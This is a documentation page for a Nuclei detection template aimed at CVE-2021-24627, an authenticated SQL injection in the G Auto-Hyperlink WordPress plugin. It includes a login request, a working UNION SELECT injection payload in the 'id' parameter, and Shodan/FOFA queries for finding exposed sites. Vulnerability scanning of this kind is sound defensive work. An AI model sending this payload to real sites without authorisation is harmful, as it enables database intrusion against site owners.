Skip to content
Nuclei Templates

G Auto-Hyperlink <= 1.0.1 - SQL Injection

ID: CVE-2021-24627

Severity: high

Author: theamanrawat

Tags: cve2021,cve,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated,g_auto-hyperlink_project

Description

Section titled “Description”

The G Auto-Hyperlink WordPress plugin through 1.0.1 does not sanitise or escape an ‘id’ GET parameter before using it in a SQL statement, to select data to be displayed in the admin dashboard, leading to an authenticated SQL injection

YAML Source

Section titled “YAML Source”
id: CVE-2021-24627


info:
  name: G Auto-Hyperlink <= 1.0.1 - SQL Injection
  author: theamanrawat
  severity: high
  description: |
    The G Auto-Hyperlink WordPress plugin through 1.0.1 does not sanitise or escape an 'id' GET parameter before using it in a SQL statement, to select data to be displayed in the admin dashboard, leading to an authenticated SQL injection
  reference:
    - https://wordpress.org/plugins/g-auto-hyperlink/
    - https://wpscan.com/vulnerability/c04ea768-150f-41b8-b08c-78d1ae006bbb
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24627
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2021-24627
    cwe-id: CWE-89
    epss-score: 0.30355
    epss-percentile: 0.96947
    cpe: cpe:2.3:a:g_auto-hyperlink_project:g_auto-hyperlink:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: g_auto-hyperlink_project
    product: g_auto-hyperlink
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/g-auto-hyperlink/
    fofa-query: body=/wp-content/plugins/g-auto-hyperlink/
    publicwww-query: /wp-content/plugins/g-auto-hyperlink/
  tags: cve2021,cve,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated,g_auto-hyperlink_project
variables:
  num: 999999999


http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        log={{username}}&pwd={{password}}&wp-submit=Log+I
      - |
        GET /wp-admin/admin.php?page=g-auto-hyperlink-edit&id=-2198+UNION+ALL+SELECT+NULL%2Cmd5%28{{num}}%29%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "c8c605999f3d8352d7bb792cf3fdb25b"
          - "Keyword"
          - "g-auto-hyperlink-edit"
        condition: and


      - type: word
        part: header_2
        words:
          - "text/html"


      - type: status
        status:
          - 200
# digest: 4a0a0047304502202f5ea2adad6f298667df221c604298e0914460cc754b19c5358b8b88b3740959022100a1949bcdc3a6a94110eb3a791eda9220c199af80629c71f81f8309c0dc52e639:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24627.yaml"

View on Github